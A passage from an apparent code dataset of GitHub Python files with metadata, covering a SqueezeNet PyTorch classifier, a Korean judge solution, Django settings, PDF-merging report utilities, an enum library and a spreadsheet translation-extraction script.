nn.ReLU(inplace=True)\n\n def forward(self, X):\n X = self.squeeze_activation(self.squeeze(X))\n X = torch.cat([\n self.expand1x1_activation(self.expand1x1(X)),\n self.expand3x3_activation(self.expand3x3(X))\n ], dim=1)\n\n return X\n\n\n\nclass SqueezeNet(nn.Module):\n def __init__(self):\n super(SqueezeNet, self).__init__()\n\n self.features = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=96, kernel_size=7, stride=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n Fire(96, 16, 64, 64),\n Fire(128, 16, 64, 64),\n Fire(128, 32, 128, 128),\n nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n Fire(256, 32, 128, 128),\n Fire(256, 48, 192, 192),\n Fire(384, 48, 192, 192),\n Fire(384, 64, 256, 256),\n nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n Fire(512, 64, 256, 256)\n )\n\n self.classifier = nn.Sequential(\n nn.Dropout(p=0.5),\n nn.Conv2d(512, 1000, kernel_size=1), #输出 13*13*1000\n nn.ReLU(inplace=True),\n nn.AdaptiveAvgPool2d((1, 1)) #输出 1*1*1000\n )\n\n def forward(self, X):\n X = self.features(X)\n print(X.shape)\n X = self.classifier(X)\n return torch.flatten(X, 1)\n\n#对图像的预处理(固定尺寸到224, 转换成touch数据, 归一化)\ntran = transforms.Compose([\n transforms.Resize((224,224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n])\n\nif __name__ == '__main__':\n image = Image.open(\"tiger.jpeg\")\n image = tran(image)\n image = torch.unsqueeze(image, dim=0)\n\n net = SqueezeNet()\n # net = squeezenet1_0()\n for name, parameter in net.named_parameters():\n print(\"name={},size={}\".format(name, parameter.size()))\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n net = net.to(device)\n image = image.to(device)\n net.load_state_dict(torch.load(\"squeezenet1_0-a815701f.pth\")) # 加载pytorch中训练好的模型参数\n net.eval()\n\n output = net(image)\n test, prop = torch.max(output, 1)\n synset = [l.strip() for l in open(\"synset.txt\").readlines()]\n print(\"top1:\", synset[prop.item()])\n\n preb_index = torch.argsort(output, dim=1, descending=True)[0]\n top5 = [(synset[preb_index[i]], output[0][preb_index[i]].item()) for i in range(5)]\n print((\"Top5: \", top5))\n\n\n\n","repo_name":"l274282603/CV_ConvNetModel","sub_path":"SqueezeNet/SqueezeNet_pytorch.py","file_name":"SqueezeNet_pytorch.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"4780092975","text":"\"\"\"\n문제\n서로 다른 N개의 자연수의 합이 S라고 한다. S를 알 때, 자연수 N의 최댓값은 얼마일까?\n\n입력\n첫째 줄에 자연수 S(1 ≤ S ≤ 4,294,967,295)가 주어진다.\n\n출력\n첫째 줄에 자연수 N의 최댓값을 출력한다.\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nS = int(input())\nn = 1\nsum = 0\nwhile(1):\n sum = (n*(n+1))/2\n if sum > S:\n break\n n = n + 1\n\nprint(n-1)","repo_name":"singsoong/BOJsolve","sub_path":"1789_수들의 합.py","file_name":"1789_수들의 합.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39381213752","text":"\"\"\"\nDjango base settings\n\nDESCRIPTION:\nThis file contains common settings between the development and\nproduction environments. Feel free to add additional settings\nfiles for staging and testing.\n\nSECURITY:\nYour django SECRET_KEY will be autogenerated in 'secrets.json'.\nPassword sensitive settings and API keys should go into 'secrets.py'.\n\nMore information on the Django settings file:\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\nDjango Extensions Commands:\nhttp://django-extensions.readthedocs.org/en/latest/command_extensions.html\n\"\"\"\n\n################################################################\n# BASE APPLICATION SETTINGS\n################################################################\nDJANGO_APPS = [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\nPLUGIN_APPS = [\n 'grappelli',\n 'braces',\n 'django_extensions',\n 'django.contrib.admin',\n]\n\nPROJECT_APPS = [\n 'vanilla.apps.core',\n 'vanilla.apps.website',\n]\n\nINSTALLED_APPS = DJANGO_APPS + PLUGIN_APPS + PROJECT_APPS\n\n\n################################################################\n# BASE CONFIGURATION SETTINGS\n################################################################\n\n# Django root urls file\nROOT_URLCONF = 'vanilla.urls'\n\n# WSGI application\nWSGI_APPLICATION = 'vanilla.wsgi.application'\n\n# Debug settings\nDEBUG = False\nTEMPLATE_DEBUG = False\n\n# Site URL extras\nAPPEND_SLASH = True\nPREPEND_WWW = False\n\n# Specifiy hosts\nALLOWED_HOSTS = [\n 'localhost'\n]\n\n\n################################################################\n# BASE DIRECTORY SETTINGS\n################################################################\nfrom unipath import Path\n\n# Same directory as `manage.py`\nBASE_DIR = Path(__file__).ancestor(3)\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\n\nSTATICFILES_DIRS = (\n BASE_DIR.child('static'),\n)\n\n################################################################\n# BASE MIDDLEWARE SETTINGS\n################################################################\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.cache.UpdateCacheMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.cache.FetchFromCacheMiddleware',\n)\n\n\n################################################################\n# BASE SECRETS SETTINGS\n################################################################\nfrom django.core.exceptions import ImproperlyConfigured as ICONFIG\nfrom vanilla.settings.secrets import *\nfrom json import loads as loadjson\n\ntry:\n with open('secrets.json') as fp:\n SECRETS = loadjson(fp.read())\n SECRET_KEY = SECRETS['SECRET_KEY']\nexcept IOError:\n raise ICONFIG('File not found: secrets.json')\nexcept KeyError:\n raise ICONFIG('SECRET_KEY is not defined.')\n\n\n################################################################\n# BASE AUTHENTICATION SETTINGS\n################################################################\n\n# The model to use to represent a User.\nAUTH_USER_MODEL = 'auth.User'\n\n# The URL where requests are redirected for login.\n# LOGIN_URL = '/accounts/login/'\n\n# The URL where requests are redirected for logout.\n# LOGOUT_URL = '/accounts/logout/'\n\n# The URL where requests are redirected after login.\n# LOGIN_REDIRECT_URL = '/accounts/profile/'\n\n\n################################################################\n# BASE INTERNATIONALIZATION / MISC SETTINGS\n################################################################\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n","repo_name":"codenameyau/vagrant-boxes","sub_path":"vagrant-django/vanilla/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"38212944063","text":"import jinja2\nimport os\nimport shutil\nfrom django.core.management.base import BaseCommand\nfrom datetime import datetime, date\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\nfrom assessments.models import Survey\nfrom boundary.models import ElectionBoundary, Boundary\n\n\nclass CommonUtils():\n \n def initiatelatex(self):\n # create the build directory if not existing\n if not os.path.exists(self.build_d):\n os.makedirs(self.build_d)\n latex_jinja_env = jinja2.Environment(\n variable_start_string='{{',\n variable_end_string='}}',\n comment_start_string='\\#{',\n comment_end_string='}',\n line_comment_prefix='%%',\n trim_blocks=True,\n autoescape=False,\n loader=jinja2.FileSystemLoader(os.path.abspath('/'))\n )\n for filetype in self.templates:\n self.templates[filetype][\"latex\"] = latex_jinja_env.get_template(\n self.basefiledir+self.templatedir+self.templates[filetype][\"template\"])\n\n \n def validateGPIds(self, gpids):\n for gpid in gpids:\n print(gpid)\n try:\n ElectionBoundary.objects.get(id=gpid, const_ward_type='GP')\n except ElectionBoundary.DoesNotExist:\n print(\"Invalid gpid: \"+str(gpid)+\" passed\")\n return False\n return True\n\n def validateBoundaryIds(self, boundaryids, boundaryType):\n for bid in boundaryids:\n try:\n Boundary.objects.get(\n id=bid, boundary_type_id=boundaryType)\n except Boundary.DoesNotExist:\n print(\"Invalid districtid: \"+str(bid)+\" passed\")\n return False\n return True\n\n def validateSurveyId(self, surveyid):\n try:\n Survey.objects.get(id=surveyid)\n except Survey.DoesNotExist:\n print(\"Invalid surveyid: \"+str(surveyid)+\" passed\")\n return False\n return True\n\n def checkYearMonth(self, yearmonth):\n try:\n datetime.strptime(yearmonth, '%Y%m')\n except ValueError:\n print(\"Year month format is invalid it should be YYYYMM, \" +yearmonth)\n return False\n return True\n\n def deleteTempFiles(self, tempFiles):\n for f in tempFiles:\n os.remove(f)\n\n def mergeReports(self, outputdir, gpfile, schoolfiles, outputfile):\n inputfiles = [outputdir+gpfile]\n for schoolfile in schoolfiles:\n inputfiles.append(outputdir+schoolfile)\n self.combinePdfs(inputfiles, outputfile, outputdir) \n self.deleteTempFiles(inputfiles)\n\n def combinePdfs(self, inputfiles, outputfile, outputdir):\n input_streams = []\n try:\n # First open all the files, then produce the output file, and\n # finally close the input files. This is necessary because\n # the data isn't read from the input files until the write\n # operation.\n output_stream = open(outputdir+\"/\"+outputfile, 'wb')\n for input_file in inputfiles:\n input_streams.append(open(input_file, 'rb'))\n writer = PdfFileWriter()\n for reader in map(PdfFileReader, input_streams):\n for n in range(reader.getNumPages()):\n writer.addPage(reader.getPage(n))\n writer.write(output_stream)\n finally:\n for f in input_streams:\n f.close()\n\n def getAcademicYear(self, startyearmonth, endyearmonth):\n startyear = int(startyearmonth[0:4])\n startmonth = int(startyearmonth[4:6])\n if startmonth <= 5:\n acadyear = str(startyear-1)+\"-\"+str(startyear)\n else:\n acadyear = str(startyear)+\"-\"+str(startyear+1)\n return acadyear\n\n\n","repo_name":"klpdotorg/ilp","sub_path":"apps/gpcontest/management/commands/baseReport.py","file_name":"baseReport.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"20749709044","text":"from __future__ import absolute_import\n\nimport abc\nimport re\nfrom builtins import str as text\nfrom numbers import Number\n\nfrom future.utils import iteritems, with_metaclass\nfrom past.builtins import long\n\n# =============================================================================\n# CLASSES\n# =============================================================================\n\n\nclass _MetaEnumGroup(type):\n \"\"\"An EnumGroup metaclass.\"\"\"\n\n def __new__(cls, className, bases, classDict): # noqa: B902\n newCls = type.__new__(cls, className, bases, classDict)\n newCls.__init_enums__()\n newCls._cls = cls\n newCls._clsName = className\n newCls._clsBases = bases\n newCls._clsDict = classDict\n return newCls\n\n def __call__(cls, number):\n number = int(number)\n e = cls.Nothing\n for enum in cls._ENUMERATORS:\n if enum & number:\n if e:\n e = e | enum\n else:\n e = enum\n return e\n\n def __getitem__(cls, key):\n if isinstance(key, Number):\n return list(cls)[int(key)]\n elif isinstance(key, slice):\n # If a Enum is passed convert it to its labelIndex\n start = key.start\n stop = key.stop\n if isinstance(start, Enum):\n start = start.labelIndex\n if isinstance(stop, Enum):\n stop = stop.labelIndex\n return list(cls)[slice(start, stop, key.step)]\n else:\n return getattr(cls, str(key))\n\n def __instancecheck__(cls, inst):\n if type(inst) == cls:\n return True\n if isinstance(inst, cls._cls):\n return True\n return False\n\n def __iter__(cls):\n for e in cls._ENUMERATORS:\n yield e\n\n def __len__(cls):\n return len(cls._ENUMERATORS)\n\n def __repr__(cls):\n return '<{mdl}.{cls}({enums})>'.format(\n mdl=cls._clsDict.get('__module__', 'unknown'),\n cls=cls._clsName,\n enums=cls.join(),\n )\n\n def __str__(cls):\n return '{0}({1})'.format(cls._clsName, cls.join())\n\n\n# =============================================================================\n\n\nclass Enum(with_metaclass(abc.ABCMeta, object)):\n \"\"\"A basic enumerator class.\n\n Enumerators are named values that act as identifiers. Typically, a\n list of enumerators are component pieces of an `EnumGroup`.\n\n Example::\n\n class Suit(Enum):\n pass\n\n class Suits(EnumGroup):\n Hearts = Suit()\n Spades = Suit()\n Clubs = Suit()\n Diamonds = Suit()\n\n Enum objects can be combined and compared using binary \"and\" and \"or\"\n operations.\n\n Example::\n\n mySuits = Suits.Hearts | Suits.Spades\n\n if Suits.Hearts & mySuits:\n print(\"This is true!\")\n\n if Suits.Clubs & mySuits:\n print(\"This is false!\")\n\n Attributes:\n name: The name of the enumerator.\n number: The integer value representation of the enumerator.\n label: The enumerator's label.\n labelIndex: The enumerator's index within its parent EnumGroup.\n \"\"\"\n\n _CREATIONORDER = 0\n\n def __init__(self, number=None, label=None, **kwargs):\n \"\"\"Initializes a new Enum object.\n\n In addition to the named arguments listed below, keyword arguments\n may be given that will be set as attributes on the Enum.\n\n Args:\n number(int): The integer representation of the Enum. The default\n is to have this number determined dynamically based on its\n place with the parent EnumGroup.\n label(str): The Enum's label. The default is to inherit the\n attribute name the Enum is associated with in its parent\n EnumGroup.\n \"\"\"\n self._creationOrder = Enum._CREATIONORDER\n Enum._CREATIONORDER += 1\n self._name = None\n self._number = number\n self._label = label\n self._labelIndex = None\n self._cmpLabel = None\n self._cmpName = None\n self._enumGroup = None\n if kwargs:\n self.__dict__.update(kwargs)\n\n @property\n def name(self):\n \"\"\"The name of the Enum.\"\"\"\n return self._name\n\n @property\n def number(self):\n \"\"\"The number representation of the Enum.\"\"\"\n return self._number\n\n @property\n def label(self):\n \"\"\"The Enum's label.\"\"\"\n return self._label\n\n @property\n def labelIndex(self):\n \"\"\"The Enum's index within its parent EnumGroup.\"\"\"\n return self._labelIndex\n\n def _setName(self, name):\n if name is None:\n self._name = None\n self._cmpName = None\n else:\n self._name = name\n self._cmpName = name.strip('_ ')\n\n def _setLabel(self, label):\n if label is None:\n self._label = None\n self._cmpLabel = None\n else:\n self._label = label\n self._cmpLabel = label.replace(' ', '').replace('_', '')\n\n def __add__(self, other):\n return self.__or__(other)\n\n def __and__(self, other):\n if isinstance(other, Enum):\n other = int(other)\n return int(self) & other\n\n def __call__(self):\n return int(self)\n\n def __cmp__(self, value):\n if not isinstance(value, Enum):\n return -1\n return self.number - value.number\n\n def __lt__(self, value):\n return self.__cmp__(value) < 0\n\n def __eq__(self, value):\n if value is None:\n return False\n if isinstance(value, Enum):\n return self.number == value.number\n if isinstance(value, (int, long)):\n return self.number == value\n if isinstance(value, str) or isinstance(value, text):\n if self._compareStr(value):\n return True\n return False\n\n def __hash__(self):\n return self.number\n\n def __index__(self):\n return self.number\n\n def __int__(self):\n return self.number or 0\n\n def __invert__(self):\n return ~int(self)\n\n def __ne__(self, value):\n return not self.__eq__(value)\n\n def __nonzero__(self):\n return bool(int(self))\n\n def __or__(self, other):\n o = other\n if isinstance(other, Enum):\n o = int(other)\n # No need to return a CompositeEnum if one of these is Nothing\n if o == 0:\n return self\n v = int(self)\n if v == 0:\n return other\n value = v | o\n label = '{0} {1}'.format(str(self), str(other))\n name = '{0}_{1}'.format(str(self), str(other))\n\n class CompositeEnum(Enum):\n def __init__(ss, number, lbl, name): # noqa: N805,B902\n super(CompositeEnum, ss).__init__(number, lbl)\n ss._name = name\n\n # Register our composite enum class as a virtual\n # subclass of this enum's class, plus the same for\n # the other enum if it's an Enum object. This\n # will make the composite enum isinstance check true\n # against both.\n type(self).register(CompositeEnum)\n if isinstance(other, Enum):\n type(other).register(CompositeEnum)\n return CompositeEnum(value, label, name)\n\n def __rand__(self, other):\n if isinstance(other, Enum):\n other = int(other)\n return other & int(self)\n\n def __repr__(self):\n return '<{mdl}.{cls}.{name}>'.format(\n mdl=self.__class__.__module__,\n cls=self.__class__.__name__,\n name=str(self.name),\n )\n\n def __ror__(self, other):\n return self | other\n\n def __rxor__(self, other):\n return self ^ other\n\n def __str__(self):\n if self.name:\n return self.name\n return self.label or ''\n\n def __xor__(self, other):\n if isinstance(other, Enum):\n other = int(other)\n return int(self) ^ other\n\n def _compareStr(self, inStr):\n return inStr.replace(' ', '').replace('_', '') in (\n self._cmpLabel,\n self._cmpName,\n )\n\n\n# =============================================================================\n\n\nclass EnumGroup(with_metaclass(_MetaEnumGroup, object)):\n \"\"\"A container class for collecting, organizing, and accessing Enums.\n\n An EnumGroup class is a container for Enum objects. It provides\n organizational convenience, and in most cases handles the generation\n and assignment of Enum numbers, names, and labels.\n\n Example::\n\n class Suit(Enum):\n pass\n\n class Suits(EnumGroup):\n Hearts = Suit()\n Spades = Suit()\n Clubs = Suit()\n Diamonds = Suit()\n\n The above example outlines defining an enumerator, and grouping\n four of them inside of a group. This provides a number of things,\n including references by attribute, name, and index. Also provided\n is an \"All\" attribute, if one is not explicitly assigned, it will be\n a CompositeEnum of all the defined enums, and compare true against\n any members of the group via the binary \"and\" operator. Also provided\n is an \"Nothing\" attribute, if one is not explicitly assigned, it\n compares false against any members of the group and when converted to\n a int its value will be zero.\n\n Example::\n\n # By attribute.\n Suits.Hearts\n\n # By name.\n Suits['Hearts']\n\n suitList = list(Suits)\n\n if Suits.Hearts & Suits.All:\n print(\"This is true!\")\n\n You can also pass a int value as a index lookup. If you pass a int value it\n will return the object by its index. This means you can not lookup composite\n Enum objects as 3 returns the third index which in the above example is Diamonds.\n The index value for Enum is stored on its labelIndex property.\n\n Example::\n\n print(Suits.Diamonds.labelIndex)\n\n if Suits.Diamonds == Suits[3]:\n print(\"This is true!\")\n\n An EnumGroup can be sliced by passing an Enum object or its labelIndex value for\n start and stop, returning a list of matching Enums.\n\n Example::\n\n # All Enums between Spades and Diamonds\n Suits[Suits.Spades:Suits.Diamonds]\n\n # All Enums between Spades and Clubs including Clubs\n Suits[Suits.Spades:Suits.Clubs.labelIndex+1]\n\n An EnumGroup can also act as a factory for composite Enum objects.\n If a known composite value is available, like 3, which is the\n combination of enum values 1 and 2, a composite Enum object can\n be constructed.\n\n Example::\n\n comp = Suits(3)\n\n if Suits.Hearts & comp:\n print(\"This is true!\")\n\n if Suits.Clubs & comp:\n print(\"This is false!\")\n\n If one of the Enum's has the default keyword argument set to True, then that Enum\n is also exposed as the \"Default\" attribute. Additionally all other Enum's will have\n a default property added and set to False.\n\n Example::\n\n class Suits(EnumGroup):\n Hearts = Suit()\n Spades = Suit(default=True)\n\n assert Suits.Hearts.default == False\n assert Suits.Spades.default == True\n assert Suits.Default == Suits.Spades\n\n Attributes:\n All: The sum of all members.\n Nothing: None of the members.\n \"\"\"\n\n _ENUMERATORS = None\n _copyCount = 1\n All = 0\n Nothing = 0\n\n def __init__(self):\n raise InstantiationError('Unable to instantiate static class EnumGroup.')\n\n @classmethod\n def append(cls, *args, **kwargs):\n \"\"\"Appends additional enumerators to the EnumGroup.\n\n New members can be provided as ordered arguments where the\n each Enum's label is used to determine the attribute name, or\n by keyword arguments where the key is the attribute name and\n the Enum is the value. When using an Enum's label to determine\n its name, any spaces in the label will be converted to underscores.\n\n Example:\n Suits.append(Suit(None, 'Funky'), Foo=Suit())\n\n # The \"Funky\" and \"Foo\" suits are now available.\n Suits.Funky\n Suits.Foo\n\n Raises:\n ValueError\n \"\"\"\n if [e for e in (list(args) + list(kwargs.values())) if not isinstance(e, Enum)]:\n raise ValueError('Given items must be of class Enum.')\n if [e for e in args if not e.label]:\n raise ValueError('Enums given as ordered arguments must have a label.')\n for e in args:\n setattr(cls, cls._labelToVarName(e.label), e)\n for n, e in iteritems(kwargs):\n setattr(cls, n, e)\n # reset All and Nothing -- this is necessary so that All is regenerated\n # and so that Nothing is not included when finding the member Enums.\n cls.All = 0\n cls.Nothing = 0\n cls.__init_enums__()\n\n @classmethod\n def copy(cls, name=None):\n \"\"\"Returns a new class type from this class without any Enums assigned.\n\n If name is not provided it will automatically generate a new class name.\n For example if the EnumGroup class named DefaultEnums has been copied\n twice the new class name will be \"DefaultEnums_3\".\n If you provide name it will not check for duplicates.\n\n Args:\n name (str|None): The name to give the new class. Defaults to None\n\n Returns:\n EnumGroup: A new Class type.\n \"\"\"\n if not name:\n # Generate a unique name for the class if one was not provided\n name = '{name}_{count}'.format(name=cls.__name__, count=cls._copyCount)\n cls._copyCount += 1\n return type(name, cls.__bases__, dict(cls.__dict__))\n\n @classmethod\n def fromLabel(cls, label, default=None):\n \"\"\"Gets an enumerator based on the given label.\n\n If a default is provided and is not None, that value will be returned\n in the event that the given label does not exist in the EnumGroup. If\n no default is provided, a ValueError is raised.\n\n Args:\n label(str): The label to look up.\n default(*): The default value to return if the label is not found.\n\n Raises:\n ValueError: Raised if default is None and the given label does not\n exist in the EnumGroup.\n\n Returns:\n Enum\n \"\"\"\n label = str(label)\n for e in cls._ENUMERATORS:\n if e.label == label:\n return e\n if default is not None:\n return default\n raise ValueError('No enumerators exist with the given label.')\n\n @classmethod\n def fromValue(cls, value, default=None, allowComposite=False):\n \"\"\"Gets an enumerator based on the given value.\n\n If a default is provided and is not None, that value will be returned\n in the event that the given label does not exist in the EnumGroup. If\n no default is provided, a ValueError is raised.\n\n Args:\n value (int): The value to look up.\n default (*): The default value to return if the label is not found.\n allowComposite (bool, optional): If True a composite enums will be\n created when provided a value that is the sum of multiple enum\n values. Otherwise, a ValueError will be raised. Defaults to\n False.\n\n Returns:\n Enum\n\n Raises:\n ValueError: Raised if default is None and the given label does not\n exist in the EnumGroup.\n \"\"\"\n value = int(value)\n composite = None\n for e in cls._ENUMERATORS:\n eVal = int(e)\n if eVal == value:\n return e\n if allowComposite and eVal & value:\n composite = e if composite is None else (composite | e)\n if composite is not None and int(composite) == value:\n return composite\n if default is not None:\n return default\n raise ValueError('No enumerators exist with the given value.')\n\n @classmethod\n def join(cls, include=None, separator=','):\n \"\"\"Joins all child Enums together into a single string.\n\n The string representation of each Enum is joined using the\n given separator.\n\n Args:\n include(int|Enum): Only enumerators that compare via bitwise \"and\" against\n the given int or Enum will be returned. Default is EnumGroup.All.\n separator(str): The separator to use. Default is \",\".\n\n Returns:\n str: The joined enumerators.\n \"\"\"\n include = include is None and cls.All or include\n return str(separator).join(\n [str(e) for e in cls._ENUMERATORS if e & int(include)]\n )\n\n @classmethod\n def labels(cls):\n \"\"\"A generator containing all Enum labels in the EnumGroup.\"\"\"\n return (e.label for e in cls._ENUMERATORS)\n\n @classmethod\n def names(cls):\n \"\"\"A generator containing all Enum names in the EnumGroup.\"\"\"\n return (e.name for e in cls._ENUMERATORS)\n\n @classmethod\n def split(cls, string, separator=','):\n \"\"\"Splits the given string and returns the corresponding Enums.\n\n The string is split using the provided separator, and all names\n contained within must be attributes of the EnumGroup class that\n is performing the split.\n\n Args:\n string(str): The string containing the desired Enum names.\n separator(str): The separator to split on. Default is ','.\n\n Raises:\n AttributeError\n\n Returns:\n list(Enum, ...): The list of resulting Enum objects.\n \"\"\"\n names = str(string).split(str(separator))\n return [getattr(cls, n) for n in names]\n\n @classmethod\n def values(cls):\n \"\"\"A generator containing all Enum values in the EnumGroup.\"\"\"\n return (int(e) for e in cls._ENUMERATORS)\n\n @classmethod\n def __init_enums__(cls):\n enums = []\n default_enum = None\n\n orderedEnums = sorted(\n [\n (k, v)\n for k, v in iteritems(cls.__dict__)\n if isinstance(v, Enum) and k not in ('All', 'Nothing')\n ],\n key=lambda i: i[1]._creationOrder,\n )\n for name, value in orderedEnums:\n enums.append(value)\n value._enumGroup = cls\n value._setName(name)\n if value.label is None:\n value._setLabel(cls._varNameToLabel(name))\n # Check for a default property and raise a error if more than one is found\n if hasattr(value, 'default') and value.default:\n if default_enum is not None:\n raise ValueError(\n (\n '\"{}\" already defines default and \"{}\" is trying to '\n 'claim the default'\n ).format(default_enum, value)\n )\n default_enum = value\n\n enumNumbers = [enum.number for enum in enums if enum.number]\n num = 1\n for enum in enums:\n if enum._number is None:\n while num in enumNumbers:\n num *= 2\n enum._number = num\n enumNumbers.append(num)\n enums.sort()\n labelIndex = 0\n for enum in enums:\n if enum._label is not None:\n enum._labelIndex = labelIndex\n labelIndex += 1\n # Add a default property to all enums for consistency\n if default_enum and not hasattr(enum, 'default'):\n enum.default = False\n cls._ENUMERATORS = enums\n # Build the All object if its not defined\n if isinstance(cls.All, int):\n for e in enums:\n if isinstance(cls.All, int):\n cls.All = e\n else:\n cls.All |= e\n # Build the Nothing object if its not defined\n if isinstance(cls.Nothing, int) and enums:\n processed = set()\n for i, enum in enumerate(enums):\n enumClass = enum.__class__\n if i == 0:\n # Create the Nothing instance from the first class type\n cls.Nothing = enumClass(0, 'Nothing')\n elif enumClass not in processed:\n # Register our Nothing enum's class as a virtual\n # subclass of any additional enum classes. This\n # will make the Nothing enum isinstance check true\n # against all Enums in this EnumGroup.\n enumClass.register(cls.Nothing.__class__)\n processed.add(enumClass)\n # If a default was specified, store it on the Default argument\n if default_enum and not hasattr(cls, 'Default'):\n cls.Default = default_enum\n # Ensure the All and Nothing Enum's have a default as well\n cls.All.default = False\n if enums:\n cls.Nothing.default = False\n\n @classmethod\n def _varNameToLabel(cls, varName):\n label = str(varName)\n label = ' '.join(re.findall('[A-Z]+[^A-Z]*', label))\n label = re.sub(r'[_\\s]+', ' ', label)\n return label\n\n @classmethod\n def _labelToVarName(cls, label):\n name = str(label)\n name = re.sub(r'\\s+', '_', name)\n return name\n\n\n# =============================================================================\nclass Incrementer(object):\n \"\"\"A class that behaves similarly to c i++ or ++i.\n\n Once you init this class, every time you call it it will update count and return the\n previous value like c's i++. If you pass True to pre, it will increment then return\n the new value like c's ++i.\n\n Args:\n start (int): Start the counter at this value. Defaults to Zero.\n\n increment (int): increment by this value. In most cases it should be 1 or -1.\n Defaults to one.\n\n pre (bool): If true calling the object will return the incremented value. If\n False it will return the current value and increment for the next call.\n Defaults to False.\n\n Attributes:\n count: The current value.\n increment: The incremnt added to count\n pre: Should it preform a ++i or i++ operation when called.\n \"\"\"\n\n def __init__(self, start=0, increment=1, pre=False):\n super(Incrementer, self).__init__()\n self.count = start\n self.increment = increment\n self.pre = pre\n\n def __call__(self):\n if self.pre:\n self.count += self.increment\n return self.count\n ret = self.count\n self.count += self.increment\n return ret\n\n def __repr__(self):\n return '{}.{}(start={}, increment={}, pre={!r})'.format(\n self.__module__, type(self).__name__, self.count, self.increment, self.pre\n )\n\n def __str__(self):\n return str(self.count)\n\n\n# =============================================================================\n# EXCEPTIONS\n# =============================================================================\n\n\nclass InstantiationError(Exception):\n pass\n\n\n# =============================================================================\n","repo_name":"blurstudio/PrEditor","sub_path":"preditor/enum.py","file_name":"enum.py","file_ext":"py","file_size_in_byte":23489,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"73943284311","text":"import pandas as pd\nimport os\nimport openpyxl\nimport datetime\n\nXLS_COLUMNS = {\n 6: \"Kurzbeschreibung\",\n 7: \"Optionstext\",\n 9: \"Lieferumfang\",\n 10: \"Einleitung\",\n 11: \"Langbeschreibung\",\n 12: \"Ergaenzung-Bullets\",\n 13: \"Weitere-Anmerkungen\",\n 14: \"Weitere-Besonderheiten\",\n 15: \"Achtung\",\n # 16: \"Variante\",\n 16: \"Hinweis\",\n 17: \"Typ\",\n 18: \"Abmessungen\",\n # 20: \"Leistung-Leuchtmittel\"\n }\n\nCURR_PATH = \"e:\\\\Moje dokumenty\\\\SG_scripts_data\\\\Reuter\\\\2023-12-01\\\\\"\nEXPORTS4TRANS = CURR_PATH + \"exports4trans\\\\\"\nEXPORTED_COLUMNS = CURR_PATH + \"4trans_sheets\\\\\"\nTRANSCOLUMNS = list(XLS_COLUMNS.keys())\n\n\ndef extract_strings(worksheet, column_no, row_limit):\n prev_time = datetime.datetime.now()\n curr_row = 2\n DE_strings = pd.DataFrame(columns=[\"datenart\", \"sprache\", \"produktno\", \"navisionid\", \"text\"])\n PL_strings = pd.DataFrame(columns=[\"datenart\", \"sprache\", \"produktno\", \"navisionid\", \"text\"])\n while curr_row < row_limit:\n if worksheet.cell(row=curr_row, column=2).value == \"deu\" and \\\n worksheet.cell(row=curr_row, column=column_no).value is not None:\n source_datenart = worksheet.cell(row=curr_row, column=1).value\n source_sprache = worksheet.cell(row=curr_row, column=2).value\n source_produktno = worksheet.cell(row=curr_row, column=3).value\n source_navisionid = worksheet.cell(row=curr_row, column=4).value\n source_text = worksheet.cell(row=curr_row, column=column_no).value\n \n data = {\"datenart\": [source_datenart],\n \"sprache\": [source_sprache],\n \"produktno\": [source_produktno],\n \"navisionid\": [source_navisionid],\n \"text\": [source_text]}\n \n new_row = pd.DataFrame(data)\n DE_strings = pd.concat([DE_strings, new_row], ignore_index=True)\n \n elif worksheet.cell(row=curr_row, column=2).value == \"pol\" and \\\n worksheet.cell(row=curr_row, column=column_no).value is None:\n target_datenart = worksheet.cell(row=curr_row, column=1).value\n target_sprache = worksheet.cell(row=curr_row, column=2).value\n target_produktno = worksheet.cell(row=curr_row, column=3).value\n target_navisionid = worksheet.cell(row=curr_row, column=4).value\n target_text = worksheet.cell(row=curr_row, column=column_no).value\n\n \n data = {\"datenart\": [target_datenart],\n \"sprache\": [target_sprache],\n \"produktno\": [target_produktno],\n \"navisionid\": [target_navisionid],\n \"text\": [target_text]}\n \n new_row = pd.DataFrame(data)\n PL_strings = pd.concat([PL_strings, new_row], ignore_index=True)\n \n else:\n pass\n curr_row += 1\n if curr_row % 5000 == 0:\n curr_time = datetime.datetime.now()\n time_delta = curr_time - prev_time\n print(f\"Column: {XLS_COLUMNS[column_no]}, Progress: {curr_row}/{row_limit}, Time: {curr_time}, Delta: {time_delta}\")\n prev_time = curr_time\n\n DE_strings_unique = 